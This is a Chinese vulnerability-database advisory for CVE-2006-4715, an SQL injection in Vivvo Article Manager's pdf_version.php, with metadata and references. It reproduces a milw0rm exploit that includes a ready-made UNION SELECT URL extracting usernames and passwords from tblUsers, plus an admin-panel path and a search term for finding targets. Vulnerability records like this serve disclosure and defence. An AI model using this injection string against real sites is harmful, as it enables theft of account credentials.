SpoonLabs Vivvo Article Management CMS'Pdf_Version.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110990 漏洞类型 SQL注入
发布时间 2006-09-09 更新时间 2006-09-13
CVE编号 CVE-2006-4715 CNNVD-ID CNNVD-200609-182
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2337
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-182
|漏洞详情
SpoonLabsVivvoArticleManagementCMS(也称为phpWordPress)3.2及更早版本的pdf_version.php中存在SQL注入漏洞,远程攻击者可以通过id参数执行任意SQL命令。
|漏洞EXP
############################################################
#MercilessTurk info@kahramanhost.com
############################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
############################################################
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
############################################################
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
############################################################
#Admin Panel:http://[target]/[path]/admin
############################################################
#For google searching:Vivvo Article Manager
############################################################
#Greetz: sanaldarbe.com members.
############################################################

# milw0rm.com [2006-09-09]
|参考资料

来源:SECUNIA
名称:21855
链接:http://secunia.com/advisories/21855
来源:BID
名称:19934
链接:http://www.securityfocus.com/bid/19934
来源:MILW0RM
名称:2337
链接:http://www.milw0rm.com/exploits/2337
来源:VUPEN
名称:ADV-2006-3548
链接:http://www.frsirt.com/english/advisories/2006/3548
来源:MISC
链接:http://securitydot.net/xpl/exploits/vulnerabilities/articles/1464/exploit.html
来源:XF
名称:vivvo-pdfversion-sql-injection(28833)
链接:http://xforce.iss.net/xforce/xfdb/28833
来源:MILW0RM
名称:2337
链接:http://milw0rm.com/exploits/2337